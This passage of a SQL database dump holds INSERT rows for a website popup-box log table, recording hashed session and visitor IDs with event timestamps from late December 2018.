(43268, 'a8e1552769c948c62fac024fdd26c41c', '1ed1872f69d21a43', 0, 2, 1, '2018-12-28 17:06:51'),
(43269, '8471e70867994790dd4b2466169a6849', '1d9c54d0b37930ed', 0, 2, 1, '2018-12-28 17:07:34'),
(43270, 'd62df380d376d09d74fc627e309af94f', 'e74a2ac966dcd07f', 0, 2, 1, '2018-12-28 17:07:45'),
(43271, '8471e70867994790dd4b2466169a6849', '1d9c54d0b37930ed', 0, 2, 1, '2018-12-28 17:07:56'),
(43272, '8471e70867994790dd4b2466169a6849', '1d9c54d0b37930ed', 0, 2, 1, '2018-12-28 17:08:03'),
(43273, '856d0d60abafb7aa29ca55a3b627e019', 'd78808ada1af1051', 0, 2, 1, '2018-12-28 17:08:16'),
(43274, '50aa1eba158dc61c0d82c3dffa0b1e01', 'dcadb578720d99b9', 0, 2, 1, '2018-12-28 17:10:09'),
(43275, '7f824493c56d7e18e28c412670a8f2aa', '38037cb31b3b9fc2', 0, 2, 1, '2018-12-28 17:13:54'),
(43276, 'f0d4ed5d581b883cd597d79d7d6dc67d', '8177a68f8a6b329c', 0, 2, 1, '2018-12-28 17:14:43'),
(43277, 'f96ef8fd66f4b5565c33b424dbf2e696', '46713cac27a94b83', 0, 2, 1, '2018-12-28 17:15:12');
INSERT INTO `y57u5_rstbox_logs` (`id`, `sessionid`, `visitorid`, `user`, `box`, `event`, `date`) VALUES
(43278, '4bb3bd4686bf3fcd16f396ee6c071b48', 'df9412cb6d06fbb6', 0, 2, 1, '2018-12-28 17:15:22'),
(43279, '50aa1eba158dc61c0d82c3dffa0b1e01', 'dcadb578720d99b9', 0, 2, 1, '2018-12-28 17:16:00'),
(43280, '7af1fc058527d738f90a56664b1a454c', '4765b5e8fd392dd4', 0, 2, 1, '2018-12-28 17:19:52'),
(43281, 'f8a729608b50e5844cfcf285ed4dc91a', '38037cb31b3b9fc2', 0, 2, 1, '2018-12-28 17:20:33'),
(43282, '6431afc57d6159f72ab5b99a89ccda71', '3c0ef43b583fe622', 0, 2, 1, '2018-12-28 17:20:48'),
(43283, '6431afc57d6159f72ab5b99a89ccda71', '3c0ef43b583fe622', 0, 2, 1, '2018-12-28 17:21:01'),
(43284, '3af5c4514bfca11315a511cf670e583f', '23c5337e5431ae04', 0, 2, 1, '2018-12-28 17:22:54'),
(43285, 'ab1e3e6ac89d4d95d48ed8fbbbb5a224', 'e60565f388b0261b', 0, 2, 1, '2018-12-28 17:23:15'),
(43286, '26b2d67d55fa3211e1a1d17376bfbf6f', '1da30cda392299b4', 0, 2, 1, '2018-12-28 17:25:02'),
(43287, 'a8ef5c9f62778948691cece85ce599da', '2fa458d0337a4355', 0, 2, 1, '2018-12-28 17:26:20'),
(43288, 'f0d4ed5d581b883cd597d79d7d6dc67d', '8177a68f8a6b329c', 0, 2, 1, '2018-12-28 17:28:24'),
(43289, 'f0d4ed5d581b883cd597d79d7d6dc67d', '8177a68f8a6b329c', 0, 2, 1, '2018-12-28 17:28:34'),
(43290, 'dc598a78b42cf77896819017eb11aa79', '2034f09284a4c7ca', 0, 2, 1, '2018-12-28 17:28:42'),
(43291, '213dcf8edd82f628cb902d098ac98191', '0b1466b4de9b8a16', 0, 2, 1, '2018-12-28 17:29:18'),
(43292, '383912ac1aff5dd4c7303895d8b124d2', '960d12b6c14f65ca', 0, 2, 1, '2018-12-28 17:31:49'),
(43293, '889fe05d5a87895692738f686a400759', '1838bf2071834f66', 0, 2, 1, '2018-12-28 17:32:29'),
(43294, 'a8e1552769c948c62fac024fdd26c41c', '1ed1872f69d21a43', 0, 2, 1, '2018-12-28 17:32:43'),
(43295, 'efb1d32a63848a2c12fc4ebe29ad0c54', '9a1a9db6d4db8522', 0, 2, 1, '2018-12-28 17:33:04'),
(43296, 'a8e1552769c948c62fac024fdd26c41c', '1ed1872f69d21a43', 0, 2, 1, '2018-12-28 17:33:34'),
(43297, '73a7155fb8c7822ca8c517718e7139e2', '93f30eaefda9d8c4', 0, 2, 1, '2018-12-28 17:36:27'),
(43298, '73a7155fb8c7822ca8c517718e7139e2', '93f30eaefda9d8c4', 0, 2, 1, '2018-12-28 17:36:54'),
(43299, '2f283b874d066c99bcf7ee277c605630', '02cb2a0a012458e5', 0, 2, 1, '2018-12-28 17:38:00'),
(43300, 'aad22ed704a0188a1707bd73b4eb094a', 'ff674f5b621b97d9', 0, 2, 1, '2018-12-28 17:38:04'),
(43301, '6431afc57d6159f72ab5b99a89ccda71', '3c0ef43b583fe622', 0, 2, 1, '2018-12-28 17:38:12'),
(43302, '2f283b874d066c99bcf7ee277c605630', '02cb2a0a012458e5', 0, 2, 1, '2018-12-28 17:38:20'),
(43303, 'b3e2fdb3f58b29e43e5bf36b9940d168', '57a3d4b8ea87b3d9', 0, 2, 1, '2018-12-28 17:38:35'),
(43304, 'fb5f6e5f32505ce660c20dd18c8fdb92', '5d5c6e272bdea80c', 0, 2, 1, '2018-12-28 17:38:36'),
(43305, '2f283b874d066c99bcf7ee277c605630', '02cb2a0a012458e5', 0, 2, 1, '2018-12-28 17:38:51'),
(43306, 'fb5f6e5f32505ce660c20dd18c8fdb92', '5d5c6e272bdea80c', 0, 2, 1, '2018-12-28 17:39:08'),
(43307, '3af5c4514bfca11315a511cf670e583f', '23c5337e5431ae04', 0, 2, 1, '2018-12-28 17:40:52'),
(43308, '05ae76e52e5c523850b16a34e041a536', '1b5e475496daa72c', 0, 2, 1, '2018-12-28 17:43:09'),
(43309, 'c1a4b23c66fad71727967aaefa8ef6f9', '1c68b977b911188c', 0, 2, 1, '2018-12-28 17:43:15'),
(43310, '1e60aba94829413084d4dea98bca27ef', 'f6467a86ccd7de14', 0, 2, 1, '2018-12-28 17:43:33'),
(43311, '2fb4b41047eca90637ed6fc12ac440cc', '9e158b38b0089f86', 0, 2, 1, '2018-12-28 17:44:39'),
(43312, '8fc0c432084f25eb32adfc0308689c4d', '9968c5be4a7971a2', 0, 2, 1, '2018-12-28 17:44:39'),
(43313, '3a10219f232b31b84f6b684293640426', '620db3c92acd215d', 0, 2, 1, '2018-12-28 17:45:45'),
(43314, '8fc0c432084f25eb32adfc0308689c4d', '9968c5be4a7971a2', 0, 2, 1, '2018-12-28 17:46:16'),
(43315, 'f82fc7a4e0fff99a008e52fd8fc631ad', 'f6467a86ccd7de14', 0, 2, 1, '2018-12-28 17:46:31'),
(43316, '3a10219f232b31b84f6b684293640426', '620db3c92acd215d', 0, 2, 1, '2018-12-28 17:47:14'),
(43317, '3a10219f232b31b84f6b684293640426', '620db3c92acd215d', 0, 2, 1, '2018-12-28 17:47:32'),
(43318, '3af5c4514bfca11315a511cf670e583f', '23c5337e5431ae04', 0, 2, 1, '2018-12-28 17:48:05'),
(43319, '3a10219f232b31b84f6b684293640426', '620db3c92acd215d', 0, 2, 1, '2018-12-28 17:48:12'),
(43320, '3a10219f232b31b84f6b684293640426', '620db3c92acd215d', 0, 2, 1, '2018-12-28 17:48:22'),
(43321, '0f1980ae0ab46d17559bf56d53ca54de', '6e117bd555667400', 0, 2, 1, '2018-12-28 17:48:26'),
(43322, '3a10219f232b31b84f6b684293640426', '620db3c92acd215d', 0, 2, 1, '2018-12-28 17:48:30'),
(43323, '3a10219f232b31b84f6b684293640426', '620db3c92acd215d', 0, 2, 1, '2018-12-28 17:49:07'),
(43324, '7af1fc058527d738f90a56664b1a454c', '4765b5e8fd392dd4', 0, 2, 1, '2018-12-28 17:51:23'),
(43325, '6b3e1083dca13a171ee0bdd75a525472', 'd131b6333aa3bbcb', 0, 2, 1, '2018-12-28 17:53:10'),
(43326, '2c16a3ea438ea2949130071ccd039fce', 'a86d0aa20820f4cb', 0, 2, 1, '2018-12-28 17:55:11'),
(43327, '2c16a3ea438ea2949130071ccd039fce', 'a86d0aa20820f4cb', 0, 2, 1, '2018-12-28 17:58:35'),
(43328, 'f65186e9c38e1cf1a17f08c1e7b6e466', 'e3038f2b751243df', 0, 2, 1, '2018-12-28 18:02:19'),
(43329, '97ad5b2f1e700b92f167e63faca8ff4f', '8e815b2f4d02fe94', 0, 2, 1, '2018-12-28 18:08:57'),
(43330, '97ad5b2f1e700b92f167e63faca8ff4f', '8e815b2f4d02fe94', 0, 2, 1, '2018-12-28 18:09:00'),
(43331, 'ab1e3e6ac89d4d95d48ed8fbbbb5a224', 'e60565f388b0261b', 0, 2, 1, '2018-12-28 18:10:28'),
(43332, '3a51750e7e8f4c0dbfdb4fb6d2c0fdea', '6f2725b4518c2535', 0, 2, 1, '2018-12-28 18:11:00'),
(43333, 'b87fe2ba483c6bd0b7056575e9a9df1f', 'fed10d1e71fcaaeb', 0, 2, 1, '2018-12-28 18:11:36'),
(43334, '35aaad452592a91d2bd1502a467e49da', '4b8272c521136738', 0, 2, 1, '2018-12-28 18:16:11'),
(43335, '9b8e277046b61e72603cfadfdde85cd9', '77763fe8efd0a111', 0, 2, 1, '2018-12-28 18:19:32'),
(43336, '39100a7c6084063edc4127a28e17e177', '1c68b977b911188c', 0, 2, 1, '2018-12-28 18:19:43'),
(43337, '6431afc57d6159f72ab5b99a89ccda71', '3c0ef43b583fe622', 0, 2, 1, '2018-12-28 18:22:41'),
(43338, 'ab1e3e6ac89d4d95d48ed8fbbbb5a224', 'e60565f388b0261b', 0, 2, 1, '2018-12-28 18:25:04'),
(43339, '5649b257349eb7f84bd0e7aff6735efc', '1580e9ad649b9e7b', 0, 2, 1, '2018-12-28 18:26:09'),
(43340, 'a0f2a7252667a5fa98281d089da9c57e', 'c7b5d5ace7ac066b', 0, 2, 1, '2018-12-28 18:26:23'),
(43341, 'a0f2a7252667a5fa98281d089da9c57e', 'c7b5d5ace7ac066b', 0, 2, 1, '2018-12-28 18:26:41'),
(43342, '3467fb7021e7148e02f9bdc7ac9fe89d', '6a887ccd4964ed8c', 0, 2, 1, '2018-12-28 18:28:47'),
(43343, '97435c685207bc166dbae3849fc42c50', 'b88d7d1f8a3bb1f5', 0, 2, 1, '2018-12-28 18:31:02'),
(43344, '6533f2845153060c876408550b4e55a7', 'd8923e60c6dca0dc', 0, 2, 1, '2018-12-28 18:32:36'),
(43345, '9e61b31a95a375630eb698822b7498de', '68d6262f427661c5', 0, 2, 1, '2018-12-28 18:32:36'),
(43346, '726f05b3f523e78584e3184a1937732a', 'ea556e706f8f9277', 0, 2, 1, '2018-12-28 18:33:15'),
(43347, 'e02de2bd9f1b357d2f6025bae55ce496', 'ea9410bf7dd63565', 0, 2, 1, '2018-12-28 18:33:47'),
(43348, '726f05b3f523e78584e3184a1937732a', 'ea556e706f8f9277', 0, 2, 1, '2018-12-28 18:33:48'),
(43349, '22c3f55b0e32e6823fd015199ff0093e', '4cedd43a9d17ea0b', 0, 2, 1, '2018-12-28 18:34:41'),
(43350, '777ebbb7cfa25812b8328cec53175867', 'f6467a86ccd7de14', 0, 2, 1, '2018-12-28 18:35:42'),
(43351, 'cb5c6fec3f04eadc3d0a6278e1fc3fb0', '4574603cf07e6399', 0, 2, 1, '2018-12-28 18:37:04'),
(43352, '97435c685207bc166dbae3849fc42c50', 'b88d7d1f8a3bb1f5', 0, 2, 1, '2018-12-28 18:38:28'),
(43353, 'c7e4fe40acfd68468bc10f49c9acab12', '3e74d6b7f7b1f0fe', 0, 2, 1, '2018-12-28 18:39:27'),
(43354, '3faa47dafbbb581af7f04702bde2deb9', '38037cb31b3b9fc2', 0, 2, 1, '2018-12-28 18:39:27'),
(43355, '3af5c4514bfca11315a511cf670e583f', '23c5337e5431ae04', 0, 2, 1, '2018-12-28 18:39:29'),
(43356, 'f5188774a489df52630ea2a11520e7bf', '16be5208d369f5f1', 0, 2, 1, '2018-12-28 18:39:40'),
(43357, 'bc8c9774e5edc40490d99dd0471e5261', '8e815b2f4d02fe94', 0, 2, 1, '2018-12-28 18:40:37'),
(43358, 'd87428cd88beeb3e2c65ff62bd717615', 'de9b8e6bc6e762ed', 0, 2, 1, '2018-12-28 18:41:12'),
(43359, '07d11e49abc81ffff19016f44a9084ce', '6711272a62e81edf', 0, 2, 1, '2018-12-28 18:49:48'),
(43360, '9b8e277046b61e72603cfadfdde85cd9', '77763fe8efd0a111', 0, 2, 1, '2018-12-28 18:50:44'),
(43361, '3af5c4514bfca11315a511cf670e583f', '23c5337e5431ae04', 0, 2, 1, '2018-12-28 18:53:28'),
(43362, '777b6a22602120daf409da6d66e0fc5e', '51df446c19685386', 0, 2, 1, '2018-12-28 18:53:47'),
(43363, 'b5aa3c23520824243afd6f83d6338845', 'f9b6baf479d716f2', 0, 2, 1, '2018-12-28 18:54:27'),
(43364, '3af5c4514bfca11315a511cf670e583f', '23c5337e5431ae04', 0, 2, 1, '2018-12-28 18:55:05'),
(43365, '3af5c4514bfca11315a511cf670e583f', '23c5337e5431ae04', 0, 2, 1, '2018-12-28 18:56:11'),
(43366, '1b555a86bed987953254a6ffdc675089', 'cf1ed0e204f84db2', 0, 2, 1, '2018-12-28 18:56:51'),
(43367, '65b61ce3a54a5073a21a68239136924e', 'ba32395289361d31', 0, 2, 1, '2018-12-28 18:57:40'),
(43368, '65b61ce3a54a5073a21a68239136924e', 'ba32395289361d31', 0, 2, 1, '2018-12-28 18:58:30'),
(43369, '8c8e063ac804ce6e09c9ad57d3dccd19', '59bb5978882acfd8', 0, 2, 1, '2018-12-28 19:00:32'),
(43370, '73a7155fb8c7822ca8c517718e7139e2', '93f30eaefda9d8c4', 0, 2, 1, '2018-12-28 19:02:45'),
(43371, '8ad5e3cd7a6cf4d153c85aac67f41d84', 'c0d620ee8725a926', 0, 2, 1, '2018-12-28 19:06:59'),
(43372, '4694f4bb1179973ce10ab068169cd823', '21ad7140526f4124', 0, 2, 1, '2018-12-28 19:07:21'),
(43373, '95edd6b3645dee215ddd269b1563e756', 'd16119ad3e1bf253', 0, 2, 1, '2018-12-28 19:07:26'),
(43374, '1776ee4eae3beabd54b360e3b3cc2156', '5e4f8a6ee37d1939', 0, 2, 1, '2018-12-28 19:07:39'),
(43375, '4eae16a1638d4b051d58c47cbd716b7f', 'e604f790703eef44', 0, 2, 1, '2018-12-28 19:07:41'),
(43376, '3a385078c880444002a5716a29b22de2', '93d8804454bc704f', 0, 2, 1, '2018-12-28 19:08:25'),
(43377, '3af5c4514bfca11315a511cf670e583f', '23c5337e5431ae04', 0, 2, 1, '2018-12-28 19:10:58'),
(43378, '777ebbb7cfa25812b8328cec53175867', 'f6467a86ccd7de14', 0, 2, 1, '2018-12-28 19:11:02'),
(43379, '3faa47dafbbb581af7f04702bde2deb9', '38037cb31b3b9fc2', 0, 2, 1, '2018-12-28 19:11:17'),
(43380, '3ae31ef995175c87dacfbd65e70896e5', 'e60565f388b0261b', 0, 2, 1, '2018-12-28 19:18:17'),
(43381, 'f0f006be5a246a9eb0cd95e32d9adcf6', 'c1decbbf9aca33ae', 0, 2, 1, '2018-12-28 19:22:50'),
(43382, '8cbe56242f95e3bdba1c34b91357703e', '02829647d6d6d42d', 0, 2, 1, '2018-12-28 19:23:27'),
(43383, '9acfdca015647f6a00ecdbeb755204dd', 'ef6156a3302fba73', 0, 2, 1, '2018-12-28 19:26:09'),
(43384, '1b0464b9dbe59876befe6ff363c87bb0', 'c020abbb40884763', 0, 2, 1, '2018-12-28 19:26:10'),
(43385, 'f0f006be5a246a9eb0cd95e32d9adcf6', 'c1decbbf9aca33ae', 0, 2, 1, '2018-12-28 19:29:31'),
(43386, 'fe02dc4cdd4e0d9ef6bd0d0a8a8eae76', '8093e7b53c8fbc0b', 0, 2, 1, '2018-12-28 19:30:21'),
(43387, 'b5aa3c23520824243afd6f83d6338845', 'f9b6baf479d716f2', 0, 2, 1, '2018-12-28 19:30:40'),
(43388, 'b5aa3c23520824243afd6f83d6338845', 'f9b6baf479d716f2', 0, 2, 1, '2018-12-28 19:31:01'),
(43389, '97435c685207bc166dbae3849fc42c50', 'b88d7d1f8a3bb1f5', 0, 2, 1, '2018-12-28 19:31:28'),
(43390, '4de21d3d33505c8bd612820a55926614', 'bd21ad0986732513', 0, 2, 1, '2018-12-28 19:32:31'),
(43391, '4de21d3d33505c8bd612820a55926614', 'bd21ad0986732513', 0, 2, 1, '2018-12-28 19:32:44'),
(43392, '97435c685207bc166dbae3849fc42c50', 'b88d7d1f8a3bb1f5', 0, 2, 1, '2018-12-28 19:33:11'),
(43393, '97435c685207bc166dbae3849fc42c50', 'b88d7d1f8a3bb1f5', 0, 2, 1, '2018-12-28 19:33:50'),
(43394, '4de21d3d33505c8bd612820a55926614', 'bd21ad0986732513', 0, 2, 1, '2018-12-28 19:35:12'),
(43395, 'c32ea1f5c7d86c960456f68c83e1c899', '7b16863d40230e2a', 0, 2, 1, '2018-12-28 19:36:12'),
(43396, '3af5c4514bfca11315a511cf670e583f', '23c5337e5431ae04', 0, 2, 1, '2018-12-28 19:37:56'),
(43397, 'fe02dc4cdd4e0d9ef6bd0d0a8a8eae76', '8093e7b53c8fbc0b', 0, 2, 1, '2018-12-28 19:38:01'),
(43398, '97435c685207bc166dbae3849fc42c50', 'b88d7d1f8a3bb1f5', 0, 2, 1, '2018-12-28 19:38:15'),
(43399, '24f3ae0857ea4304d71e1f3082e66de6', 'ea9410bf7dd63565', 0, 2, 1, '2018-12-28 19:40:05'),
(43400, '777ebbb7cfa25812b8328cec53175867', 'f6467a86ccd7de14', 0, 2, 1, '2018-12-28 19:40:12'),
(43401, 'f0f006be5a246a9eb0cd95e32d9adcf6', 'c1decbbf9aca33ae', 0, 2, 1, '2018-12-28 19:40:13'),
(43402, 'f0f006be5a246a9eb0cd95e32d9adcf6', 'c1decbbf9aca33ae', 0, 2, 1, '2018-12-28 19:40:43'),
(43403, '97435c685207bc166dbae3849fc42c50', 'b88d7d1f8a3bb1f5', 0, 2, 1, '2018-12-28 19:41:21'),
(43404, '60b0a820924ab856985ff5c1a7a70780', 'ce7a5ebd97e8e92e', 0, 2, 1, '2018-12-28 19:42:54'),
(43405, '9b8e277046b61e72603cfadfdde85cd9', '77763fe8efd0a111', 0, 2, 1, '2018-12-28 19:43:04'),
(43406, 'e5724426ef183549d8f7d02f42294040', 'e0a88d52fd71c485', 0, 2, 1, '2018-12-28 19:43:10'),
(43407, '777ebbb7cfa25812b8328cec53175867', 'f6467a86ccd7de14', 0, 2, 1, '2018-12-28 19:43:53'),
(43408, 'f0f006be5a246a9eb0cd95e32d9adcf6', 'c1decbbf9aca33ae', 0, 2, 1, '2018-12-28 19:43:58'),
(43409, '777ebbb7cfa25812b8328cec53175867', 'f6467a86ccd7de14', 0, 2, 1, '2018-12-28 19:45:12'),
(43410, 'f0f006be5a246a9eb0cd95e32d9adcf6', 'c1decbbf9aca33ae', 0, 2, 1, '2018-12-28 19:47:16'),
(43411, '4716cdc9760ed6fba96a04fb8c8f0dab', 'b4ecb18ba7992a18', 0, 2, 1, '2018-12-28 19:49:01'),
(43412, 'fe02dc4cdd4e0d9ef6bd0d0a8a8eae76', '8093e7b53c8fbc0b', 0, 2, 1, '2018-12-28 19:49:37'),
(43413, '3e9d3679261c76d3b72dc30d0822e655', 'f63daa34484c58e0', 0, 2, 1, '2018-12-28 19:51:11'),
(43414, '50a54bae4a3f2fc875895e6697edf77f', 'e3038f2b751243df', 0, 2, 1, '2018-12-28 19:51:39'),
(43415, '777ebbb7cfa25812b8328cec53175867', 'f6467a86ccd7de14', 0, 2, 1, '2018-12-28 19:52:16'),
(43416, '777ebbb7cfa25812b8328cec53175867', 'f6467a86ccd7de14', 0, 2, 1, '2018-12-28 19:54:47'),
(43417, '05e35a21dd39e61db681d7b8a3180aa0', '1d820d28499c8c31', 0, 2, 1, '2018-12-28 19:56:03'),
(43418, '3ed568512759850d5bb507c91ab47dff', '06dba0dd8250abf4', 0, 2, 1, '2018-12-28 19:56:23'),
(43419, '00710814fe56ef7588df3b7e8fd67a20', '8db2f78b274c00aa', 0, 2, 1, '2018-12-28 19:56:35'),
(43420, 'df8724aeb4666b045426cc503baa3c88', '7b97e0e18deae8e0', 0, 2, 1, '2018-12-28 19:56:51'),
(43421, 'a7a3e2eea2aa88ae35917d514b03c669', 'a4d896a6fb2e7ba8', 0, 2, 1, '2018-12-28 19:57:38'),
(43422, '92fb9aa34bd509e0f1b288a0ab59a4df', 'cc2105dbd92b227a', 0, 2, 1, '2018-12-28 19:57:47'),
(43423, 'a7a3e2eea2aa88ae35917d514b03c669', 'a4d896a6fb2e7ba8', 0, 2, 1, '2018-12-28 19:58:46'),
(43424, '3faa47dafbbb581af7f04702bde2deb9', '38037cb31b3b9fc2', 0, 2, 1, '2018-12-28 19:58:52'),
(43425, '6333ff3631bf349e3b7b661573ecc97a', '9e36084fd079a12d', 0, 2, 1, '2018-12-28 20:00:01'),
(43426, 'bb37383f08427a8bc561dc1a6102a9d3', '824dfd3a3f0cb93d', 0, 2, 1, '2018-12-28 20:00:09'),
(43427, 'df8724aeb4666b045426cc503baa3c88', '7b97e0e18deae8e0', 0, 2, 1, '2018-12-28 20:00:56'),
(43428, '8ad5e3cd7a6cf4d153c85aac67f41d84', 'c0d620ee8725a926', 0, 2, 1, '2018-12-28 20:02:56'),
(43429, '439634b37ce411c047f64d568e3681d8', 'bd21ad0986732513', 0, 2, 1, '2018-12-28 20:06:48'),
(43430, '15af64bf0de872bff61a18b0589903c2', '8e937091ad16072d', 0, 2, 1, '2018-12-28 20:07:05'),
(43431, '439634b37ce411c047f64d568e3681d8', 'bd21ad0986732513', 0, 2, 1, '2018-12-28 20:07:09'),
(43432, '618f0a1521f17b76ee6433adbe96814b', '0530018377078939', 0, 2, 1, '2018-12-28 20:08:42'),
(43433, '3619a3408586da8db2bc54f4bd1f9826', 'ce7a5ebd97e8e92e', 0, 2, 1, '2018-12-28 20:08:49'),
(43434, '6333ff3631bf349e3b7b661573ecc97a', '9e36084fd079a12d', 0, 2, 1, '2018-12-28 20:10:28'),
(43435, '6333ff3631bf349e3b7b661573ecc97a', '9e36084fd079a12d', 0, 2, 1, '2018-12-28 20:10:44'),
(43436, '6333ff3631bf349e3b7b661573ecc97a', '9e36084fd079a12d', 0, 2, 1, '2018-12-28 20:11:38'),
(43437, '6333ff3631bf349e3b7b661573ecc97a', '9e36084fd079a12d', 0, 2, 1, '2018-12-28 20:12:20'),
(43438, '6333ff3631bf349e3b7b661573ecc97a', '9e36084fd079a12d', 0, 2, 1, '2018-12-28 20:12:39'),
(43439, '6333ff3631bf349e3b7b661573ecc97a', '9e36084fd079a12d', 0, 2, 1, '2018-12-28 20:13:08'),
(43440, '6333ff3631bf349e3b7b661573ecc97a', '9e36084fd079a12d', 0, 2, 1, '2018-12-28 20:13:27'),
(43441, '6333ff3631bf349e3b7b661573ecc97a', '9e36084fd079a12d', 0, 2, 1, '2018-12-28 20:18:51'),
(43442, '9f7d7241bf405687c6203ce2b6fe9bd0', '4f31331ae7fe87ca', 0, 2, 1, '2018-12-28 20:18:53'),
(43443, '6333ff3631bf349e3b7b661573ecc97a', '9e36084fd079a12d', 0, 2, 1, '2018-12-28 20:19:21'),
(43444, 'eaac28b447e88c408f57c4f7bbd7888c', '5b01bcbf1e1d2683', 0, 2, 1, '2018-12-28 20:19:42'),
(43445, 'eaac28b447e88c408f57c4f7bbd7888c', '5b01bcbf1e1d2683', 0, 2, 1, '2018-12-28 20:20:04'),
(43446, 'eaac28b447e88c408f57c4f7bbd7888c', '5b01bcbf1e1d2683', 0, 2, 1, '2018-12-28 20:20:34'),
(43447, '2f7f746eaa91522f2cd9bd2bbf54bbd5', '83f3f9050d0f12fd', 0, 2, 1, '2018-12-28 20:20:41'),
(43448, '2f7f746eaa91522f2cd9bd2bbf54bbd5', '83f3f9050d0f12fd', 0, 2, 1, '2018-12-28 20:21:02'),
(43449, 'eaac28b447e88c408f57c4f7bbd7888c', '5b01bcbf1e1d2683', 0, 2, 1, '2018-12-28 20:21:30'),
(43450, '6333ff3631bf349e3b7b661573ecc97a', '9e36084fd079a12d', 0, 2, 1, '2018-12-28 20:23:26'),
(43451, '8ef17bdbc200a3200682334126586abc', '71aaffc000bb3bae', 0, 2, 1, '2018-12-28 20:24:22'),
(43452, '6333ff3631bf349e3b7b661573ecc97a', '9e36084fd079a12d', 0, 2, 1, '2018-12-28 20:25:33'),
(43453, '6333ff3631bf349e3b7b661573ecc97a', '9e36084fd079a12d', 0, 2, 1, '2018-12-28 20:27:02'),
(43454, '6333ff3631bf349e3b7b661573ecc97a', '9e36084fd079a12d', 0, 2, 1, '2018-12-28 20:28:33'),
(43455, '0b49bba2c2ec854022aee821a2d305ca', '71aaffc000bb3bae', 0, 2, 1, '2018-12-28 20:35:27'),
(43456, '6955f1dbb9cf2d25863fcfff96521886', 'c94a57206b7409d5', 0, 2, 1, '2018-12-28 20:35:51'),
(43457, '26007c924755b25125ce12bfc4d9da8a', 'a2b92167f54c9dc2', 0, 2, 1, '2018-12-28 20:36:51'),
(43458, 'c746e9ab749b6556ad8012926b8e0f4c', '8adb28e6e3f57073', 0, 2, 1, '2018-12-28 20:45:58'),
(43459, '7eb77328fd88f1cdecc24214b4020d3e', 'd78808ada1af1051', 0, 2, 1, '2018-12-28 20:55:09'),
(43460, '9b0f6a594907d8408aab9be48cef12ab', 'a817f82967ba5bfa', 0, 2, 1, '2018-12-28 20:56:17'),
(43461, '9b0f6a594907d8408aab9be48cef12ab', 'a817f82967ba5bfa', 0, 2, 1, '2018-12-28 20:58:39'),
(43462, '7f806978afd0acc88e3167899152b414', 'c69bc2771d8b36fe', 0, 2, 1, '2018-12-28 21:01:05'),
(43463, 'fc31c44f279b47e29a011e23ea43e0c9', '7e7b8558fe1fccd3', 0, 2, 1, '2018-12-28 21:01:34'),
(43464, 'fc31c44f279b47e29a011e23ea43e0c9', '7e7b8558fe1fccd3', 0, 2, 1, '2018-12-28 21:02:42'),
(43465, '7f806978afd0acc88e3167899152b414', 'c69bc2771d8b36fe', 0, 2, 1, '2018-12-28 21:03:03'),
(43466, '8cbe56242f95e3bdba1c34b91357703e', '02829647d6d6d42d', 0, 2, 1, '2018-12-28 21:04:07'),
(43467, 'e9dcc6c085044ccd515b5dad77a4ce35', 'b88d7d1f8a3bb1f5', 0, 2, 1, '2018-12-28 21:07:08'),
(43468, 'e9dcc6c085044ccd515b5dad77a4ce35', 'b88d7d1f8a3bb1f5', 0, 2, 1, '2018-12-28 21:08:22'),
(43469, 'b9e3d50561bcbf37309f5d8359f390ed', 'ec138ac7c35c53a7', 0, 2, 1, '2018-12-28 21:16:50'),
(43470, '9a8caddcba7c5deeb47ad0009d4986d0', '96f428b9a3194dc7', 0, 2, 1, '2018-12-28 21:17:55'),
(43471, 'fac0d800b42b5fa7073f00067058abc6', 'b8cd7752d177d4c2', 0, 2, 1, '2018-12-28 21:28:24'),
(43472, '636d0367877e708d8c7225799f5ea52e', '46c0a0a3fa74a938', 0, 2, 1, '2018-12-28 21:31:22'),
(43473, '383912ac1aff5dd4c7303895d8b124d2', '960d12b6c14f65ca', 0, 2, 1, '2018-12-28 21:41:41'),
(43474, 'd53fce05a271700023dd588122101b34', '6fe56a3cd549b6ed', 0, 2, 1, '2018-12-28 21:48:31'),
(43475, '0554fcff8aacbf73c212eb8c1fffb689', '2ed53befdcd0e5ed', 0, 2, 1, '2018-12-28 21:58:41'),
(43476, '0554fcff8aacbf73c212eb8c1fffb689', '2ed53befdcd0e5ed', 0, 2, 1, '2018-12-28 21:59:17'),
(43477, '8d4b9e616a10f163a2862c68fcd294f9', '52f7cae0965260fa', 0, 2, 1, '2018-12-28 21:59:31'),
(43478, '24dda588952c20d444b6a4ab4e571790', '0b1466b4de9b8a16', 0, 2, 1, '2018-12-28 22:13:41'),
(43479, '2b30d6f48765baa0c2a8298369d503f5', 'a817f82967ba5bfa', 0, 2, 1, '2018-12-28 22:15:10'),
(43480, '89e44626b5d50da7960212612dd2e37e', '360ac218dac0311b', 0, 2, 1, '2018-12-28 22:49:19'),
(43481, '19730b27219a5850a5298125bbf17874', '7da25c09a78b86be', 0, 2, 1, '2018-12-28 22:55:31'),
(43482, 'f0f006be5a246a9eb0cd95e32d9adcf6', 'c1decbbf9aca33ae', 0, 2, 1, '2018-12-28 23:01:28'),
(43483, 'dfc093afbdf96bb4b389d2f7ec6b1a9f', '8d58f387c6cebc2e', 0, 2, 1, '2018-12-28 23:05:35'),
(43484, 'a09ffa813036217b2c8801a9c7b36f96', 'a6001f3538f4ca35', 0, 2, 1, '2018-12-28 23:18:24'),
(43485, '96ba0c80f8d1d5c72e9271462c8c2587', '90ff4b4c7fc798eb', 0, 2, 1, '2018-12-28 23:28:49'),
(43486, '8477142a9d836127a13f3b86768a210a', 'fbb119663ca70368', 0, 2, 1, '2018-12-28 23:55:10'),
(43487, 'dad20f9dba85a35097af4c3efb284d70', 'f37bf779d80d3b63', 0, 2, 1, '2018-12-29 00:16:24'),
(43488, '4606e0d59368f7c82325c141f6cb5b3f', 'bd21ad0986732513', 0, 2, 1, '2018-12-29 00:17:52'),
(43489, '20ce5f98489b250cee458a21979a3f42', '9106745069da451a', 0, 2, 1, '2018-12-29 00:51:10'),
(43490, '67e5f2058a558fcf786d220077391208', '960d12b6c14f65ca', 0, 2, 1, '2018-12-29 00:55:53'),
(43491, '0be2cbfe68dd75d1e5cc7cd0ce0e96b0', 'f3c838c41f3cea71', 0, 2, 1, '2018-12-29 01:53:04'),
(43492, 'f4cba85a160a35fca6d060a419e46240', '6d5cb3610db2b0e3', 0, 2, 1, '2018-12-29 01:53:05'),
(43493, 'b37dcdacdf6259d21c3538a07e6362b0', '50d02461c9e1908b', 0, 2, 1, '2018-12-29 01:56:27'),
(43494, '04c58c4853d6cb4cbc2f962071579322', '981ad32682151249', 0, 2, 1, '2018-12-29 02:48:56'),
(43495, 'cca62adf5ef5dd68998dbd3154594910', 'd50d7502174878db', 0, 2, 1, '2018-12-29 02:56:07'),
